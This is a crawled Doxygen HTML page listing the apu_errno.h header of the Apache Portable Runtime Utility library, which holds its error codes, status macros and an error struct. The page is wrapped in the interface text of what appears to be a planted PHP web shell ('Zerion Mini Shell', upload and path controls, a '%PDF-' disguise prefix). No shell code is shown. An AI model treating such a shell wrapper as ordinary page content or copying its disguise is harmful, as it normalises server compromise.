%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/doc/libaprutil1-dev/html/
Upload File :
Create Path :
Current File : //usr/share/doc/libaprutil1-dev/html/apu__errno_8h_source.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=11"/>
<meta name="generator" content="Doxygen 1.9.8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Apache Portable Runtime Utility Library: apu_errno.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr id="projectrow">
  <td id="projectalign">
   <div id="projectname">Apache Portable Runtime Utility Library
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.9.8 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:d3d9a9a6595521f9666a5e94cc830dab83b65699&amp;dn=expat.txt MIT */
var searchBox = new SearchBox("searchBox", "search/",'.html');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:d3d9a9a6595521f9666a5e94cc830dab83b65699&amp;dn=expat.txt MIT */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */
</script>
<div id="main-nav"></div>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:d3d9a9a6595521f9666a5e94cc830dab83b65699&amp;dn=expat.txt MIT */
$(document).ready(function() { init_codefold(0); });
/* @license-end */
</script>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<div id="MSearchResults">
<div class="SRPage">
<div id="SRIndex">
<div id="SRResults"></div>
<div class="SRStatus" id="Loading">Loading...</div>
<div class="SRStatus" id="Searching">Searching...</div>
<div class="SRStatus" id="NoMatches">No Matches</div>
</div>
</div>
</div>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_d44c64559bbebec7f509842c48db8b23.html">include</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="headertitle"><div class="title">apu_errno.h</div></div>
</div><!--header-->
<div class="contents">
<a href="apu__errno_8h.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a id="l00001" name="l00001"></a><span class="lineno">    1</span><span class="comment">/* Licensed to the Apache Software Foundation (ASF) under one or more</span></div>
<div class="line"><a id="l00002" name="l00002"></a><span class="lineno">    2</span><span class="comment"> * contributor license agreements.  See the NOTICE file distributed with</span></div>
<div class="line"><a id="l00003" name="l00003"></a><span class="lineno">    3</span><span class="comment"> * this work for additional information regarding copyright ownership.</span></div>
<div class="line"><a id="l00004" name="l00004"></a><span class="lineno">    4</span><span class="comment"> * The ASF licenses this file to You under the Apache License, Version 2.0</span></div>
<div class="line"><a id="l00005" name="l00005"></a><span class="lineno">    5</span><span class="comment"> * (the &quot;License&quot;); you may not use this file except in compliance with</span></div>
<div class="line"><a id="l00006" name="l00006"></a><span class="lineno">    6</span><span class="comment"> * the License.  You may obtain a copy of the License at</span></div>
<div class="line"><a id="l00007" name="l00007"></a><span class="lineno">    7</span><span class="comment"> *</span></div>
<div class="line"><a id="l00008" name="l00008"></a><span class="lineno">    8</span><span class="comment"> *     http://www.apache.org/licenses/LICENSE-2.0</span></div>
<div class="line"><a id="l00009" name="l00009"></a><span class="lineno">    9</span><span class="comment"> *</span></div>
<div class="line"><a id="l00010" name="l00010"></a><span class="lineno">   10</span><span class="comment"> * Unless required by applicable law or agreed to in writing, software</span></div>
<div class="line"><a id="l00011" name="l00011"></a><span class="lineno">   11</span><span class="comment"> * distributed under the License is distributed on an &quot;AS IS&quot; BASIS,</span></div>
<div class="line"><a id="l00012" name="l00012"></a><span class="lineno">   12</span><span class="comment"> * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.</span></div>
<div class="line"><a id="l00013" name="l00013"></a><span class="lineno">   13</span><span class="comment"> * See the License for the specific language governing permissions and</span></div>
<div class="line"><a id="l00014" name="l00014"></a><span class="lineno">   14</span><span class="comment"> * limitations under the License.</span></div>
<div class="line"><a id="l00015" name="l00015"></a><span class="lineno">   15</span><span class="comment"> */</span></div>
<div class="line"><a id="l00016" name="l00016"></a><span class="lineno">   16</span> </div>
<div class="line"><a id="l00017" name="l00017"></a><span class="lineno">   17</span><span class="preprocessor">#ifndef APU_ERRNO_H</span></div>
<div class="line"><a id="l00018" name="l00018"></a><span class="lineno">   18</span><span class="preprocessor">#define APU_ERRNO_H</span></div>
<div class="line"><a id="l00019" name="l00019"></a><span class="lineno">   19</span> </div>
<div class="line"><a id="l00025" name="l00025"></a><span class="lineno">   25</span><span class="preprocessor">#include &quot;apr.h&quot;</span></div>
<div class="line"><a id="l00026" name="l00026"></a><span class="lineno">   26</span><span class="preprocessor">#include &quot;apr_errno.h&quot;</span></div>
<div class="line"><a id="l00027" name="l00027"></a><span class="lineno">   27</span> </div>
<div class="line"><a id="l00028" name="l00028"></a><span class="lineno">   28</span><span class="preprocessor">#ifdef __cplusplus</span></div>
<div class="line"><a id="l00029" name="l00029"></a><span class="lineno">   29</span><span class="keyword">extern</span> <span class="stringliteral">&quot;C&quot;</span> {</div>
<div class="line"><a id="l00030" name="l00030"></a><span class="lineno">   30</span><span class="preprocessor">#endif </span><span class="comment">/* __cplusplus */</span><span class="preprocessor"></span></div>
<div class="line"><a id="l00031" name="l00031"></a><span class="lineno">   31</span> </div>
<div class="line"><a id="l00063" name="l00063"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#gabf9bbd463ebcf38611f6acd423e49de9">   63</a></span><span class="preprocessor">#define APR_ENOKEY           (APR_UTIL_START_STATUS + 1)</span></div>
<div class="line"><a id="l00065" name="l00065"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga2df3db3a80a6e153134caf5d3a62a00f">   65</a></span><span class="preprocessor">#define APR_ENOIV            (APR_UTIL_START_STATUS + 2)</span></div>
<div class="line"><a id="l00067" name="l00067"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga637727cdf8285d12663ddf8bb89fa048">   67</a></span><span class="preprocessor">#define APR_EKEYTYPE         (APR_UTIL_START_STATUS + 3)</span></div>
<div class="line"><a id="l00069" name="l00069"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#gaec7a912cf8fe5f964ad8fbbafaff0241">   69</a></span><span class="preprocessor">#define APR_ENOSPACE         (APR_UTIL_START_STATUS + 4)</span></div>
<div class="line"><a id="l00071" name="l00071"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga2e98ff79515dfd5a21583d09c300d9bb">   71</a></span><span class="preprocessor">#define APR_ECRYPT           (APR_UTIL_START_STATUS + 5)</span></div>
<div class="line"><a id="l00073" name="l00073"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#gae7c077d0539cafc19917c12174ed961d">   73</a></span><span class="preprocessor">#define APR_EPADDING         (APR_UTIL_START_STATUS + 6)</span></div>
<div class="line"><a id="l00075" name="l00075"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#gabc3c0dcf5954c161df4aff0fb0ce3ae4">   75</a></span><span class="preprocessor">#define APR_EKEYLENGTH       (APR_UTIL_START_STATUS + 7)</span></div>
<div class="line"><a id="l00077" name="l00077"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga6b546475980180206e4286e35befaf55">   77</a></span><span class="preprocessor">#define APR_ENOCIPHER        (APR_UTIL_START_STATUS + 8)</span></div>
<div class="line"><a id="l00079" name="l00079"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga93f22e73099e3cd744ea96da38602065">   79</a></span><span class="preprocessor">#define APR_ENODIGEST        (APR_UTIL_START_STATUS + 9)</span></div>
<div class="line"><a id="l00081" name="l00081"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#gacda8be948c23dbd1347f3302fb1c577f">   81</a></span><span class="preprocessor">#define APR_ENOENGINE        (APR_UTIL_START_STATUS + 10)</span></div>
<div class="line"><a id="l00083" name="l00083"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga9d8482ae4b93bdce0f31f120c0511550">   83</a></span><span class="preprocessor">#define APR_EINITENGINE      (APR_UTIL_START_STATUS + 11)</span></div>
<div class="line"><a id="l00085" name="l00085"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga161b8a0f8e24033e8cd5d9068d524f00">   85</a></span><span class="preprocessor">#define APR_EREINIT          (APR_UTIL_START_STATUS + 12)</span></div>
<div class="line"><a id="l00109" name="l00109"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga060055dd2eb82e8450015fa2fae5f87c">  109</a></span><span class="preprocessor">#define APR_STATUS_IS_ENOKEY(s)        ((s) == APR_ENOKEY)</span></div>
<div class="line"><a id="l00113" name="l00113"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga5d6aa91dabbbaa71f11c293af460b143">  113</a></span><span class="preprocessor">#define APR_STATUS_IS_ENOIV(s)        ((s) == APR_ENOIV)</span></div>
<div class="line"><a id="l00117" name="l00117"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga0693be89f2dc48f2931ff4572bd5872d">  117</a></span><span class="preprocessor">#define APR_STATUS_IS_EKEYTYPE(s)        ((s) == APR_EKEYTYPE)</span></div>
<div class="line"><a id="l00121" name="l00121"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga32f4e4d4cff641d33acf3cb722e36b1f">  121</a></span><span class="preprocessor">#define APR_STATUS_IS_ENOSPACE(s)        ((s) == APR_ENOSPACE)</span></div>
<div class="line"><a id="l00125" name="l00125"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga9933a7168395bc0786b3ba477566fd7b">  125</a></span><span class="preprocessor">#define APR_STATUS_IS_ECRYPT(s)        ((s) == APR_ECRYPT)</span></div>
<div class="line"><a id="l00129" name="l00129"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga4e1e34448470111b935efafda1248628">  129</a></span><span class="preprocessor">#define APR_STATUS_IS_EPADDING(s)        ((s) == APR_EPADDING)</span></div>
<div class="line"><a id="l00133" name="l00133"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#gab705e1d1975634114d47197609b97cbf">  133</a></span><span class="preprocessor">#define APR_STATUS_IS_EKEYLENGTH(s)        ((s) == APR_EKEYLENGTH)</span></div>
<div class="line"><a id="l00137" name="l00137"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga8b6a993f66cfa692820018a7a0bf7ee6">  137</a></span><span class="preprocessor">#define APR_STATUS_IS_ENOCIPHER(s)        ((s) == APR_ENOCIPHER)</span></div>
<div class="line"><a id="l00141" name="l00141"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga13ab217618d8b37c7d85c7c2080908a0">  141</a></span><span class="preprocessor">#define APR_STATUS_IS_ENODIGEST(s)        ((s) == APR_ENODIGEST)</span></div>
<div class="line"><a id="l00145" name="l00145"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga9574130dd48e4d76082c7837d052d8d0">  145</a></span><span class="preprocessor">#define APR_STATUS_IS_ENOENGINE(s)        ((s) == APR_ENOENGINE)</span></div>
<div class="line"><a id="l00149" name="l00149"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga0330ff3219d56b41f702364de38d2a18">  149</a></span><span class="preprocessor">#define APR_STATUS_IS_EINITENGINE(s)        ((s) == APR_EINITENGINE)</span></div>
<div class="line"><a id="l00153" name="l00153"></a><span class="lineno"><a class="line" href="group___a_p_r___util___error.html#ga234e5a708e8d01eb781b4d96f0cc7b05">  153</a></span><span class="preprocessor">#define APR_STATUS_IS_EREINIT(s)        ((s) == APR_EREINIT)</span></div>
<div class="foldopen" id="foldopen00161" data-start="{" data-end="};">
<div class="line"><a id="l00161" name="l00161"></a><span class="lineno"><a class="line" href="structapu__err__t.html">  161</a></span><span class="keyword">typedef</span> <span class="keyword">struct </span><a class="code hl_struct" href="structapu__err__t.html">apu_err_t</a> {</div>
<div class="line"><a id="l00162" name="l00162"></a><span class="lineno">  162</span>    <span class="keyword">const</span> <span class="keywordtype">char</span> *reason;</div>
<div class="line"><a id="l00163" name="l00163"></a><span class="lineno">  163</span>    <span class="keyword">const</span> <span class="keywordtype">char</span> *msg;</div>
<div class="line"><a id="l00164" name="l00164"></a><span class="lineno">  164</span>    <span class="keywordtype">int</span> rc;</div>
<div class="line"><a id="l00165" name="l00165"></a><span class="lineno"><a class="line" href="group__apu__errno.html#ga2b5cc54322ac0d822b1c838b3adbbb58">  165</a></span>} <a class="code hl_struct" href="structapu__err__t.html">apu_err_t</a>;</div>
</div>
<div class="line"><a id="l00166" name="l00166"></a><span class="lineno">  166</span> </div>
<div class="line"><a id="l00169" name="l00169"></a><span class="lineno">  169</span><span class="preprocessor">#ifdef __cplusplus</span></div>
<div class="line"><a id="l00170" name="l00170"></a><span class="lineno">  170</span>}</div>
<div class="line"><a id="l00171" name="l00171"></a><span class="lineno">  171</span><span class="preprocessor">#endif</span></div>
<div class="line"><a id="l00172" name="l00172"></a><span class="lineno">  172</span> </div>
<div class="line"><a id="l00173" name="l00173"></a><span class="lineno">  173</span><span class="preprocessor">#endif  </span><span class="comment">/* ! APU_ERRNO_H */</span><span class="preprocessor"></span></div>
<div class="ttc" id="astructapu__err__t_html"><div class="ttname"><a href="structapu__err__t.html">apu_err_t</a></div><div class="ttdef"><b>Definition</b> apu_errno.h:161</div></div>
</div><!-- fragment --></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by&#160;<a href="https://www.doxygen.org/index.html"><img class="footer" src="doxygen.svg" width="104" height="31" alt="doxygen"/></a> 1.9.8
</small></address>
</body>
</html>

Zerion Mini Shell 1.0